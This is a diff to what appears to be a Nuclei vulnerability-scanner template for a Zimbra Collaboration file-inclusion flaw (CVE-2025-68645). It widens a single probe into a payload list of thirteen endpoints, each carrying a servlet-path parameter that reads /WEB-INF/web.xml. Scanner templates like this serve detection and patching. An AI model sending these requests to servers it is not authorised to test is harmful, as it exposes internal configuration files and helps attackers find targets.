diff --git a/http/cves/2025/CVE-2025-68645.yaml b/http/cves/2025/CVE-2025-68645.yaml
index 0571b24d2eff..87f34196b4d6 100644
--- a/http/cves/2025/CVE-2025-68645.yaml
+++ b/http/cves/2025/CVE-2025-68645.yaml
@@ -12,8 +12,10 @@ info:
     Update to the latest version of Zimbra Collaboration.
   reference:
     - https://x.com/sirifu4k1/status/2006031417088639064
+    - https://x.com/sirifu4k1/status/2007279822050078906?s=12&t=ovaWmJElNlGyzadE74ZOgQ
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-68645
   metadata:
-    max-request: 1
+    max-request: 13
     verified: true
     shodan-query: http.title:"Zimbra Collaboration Suite"
   tags: cve,cve2025,zimbra,zcs,lfi,vkev,kev
@@ -21,7 +23,25 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml"
+      - "{{BaseURL}}/{{path}}?javax.servlet.include.servlet_path=/WEB-INF/web.xml"
+
+    payloads:
+      path:
+        - "h/rest"
+        - "h/changepass"
+        - "h/imessage"
+        - "h/postLoginRedirect"
+        - "h/printcalls"
+        - "h/printcalendar"
+        - "h/printvoicemails"
+        - "h/printappointments"
+        - "h/printcontacts"
+        - "h/printconversations"
+        - "h/printmessage"
+        - "h/printtasks"
+        - "h/viewimages"
+
+    stop-at-first-match: true
 
     matchers-condition: and
     matchers:
@@ -36,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502203330afdc79a7f6ae501eeb5a9d8914f5f87e453fd2d8647634f50a1ea9226f82022100c6cd3cb5903a43ffe7e8b1ea780e72a0d87714c68b220670163880d61965cc29:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203330afdc79a7f6ae501eeb5a9d8914f5f87e453fd2d8647634f50a1ea9226f82022100c6cd3cb5903a43ffe7e8b1ea780e72a0d87714c68b220670163880d61965cc29:922c64590222798bb761d5b6d8e72950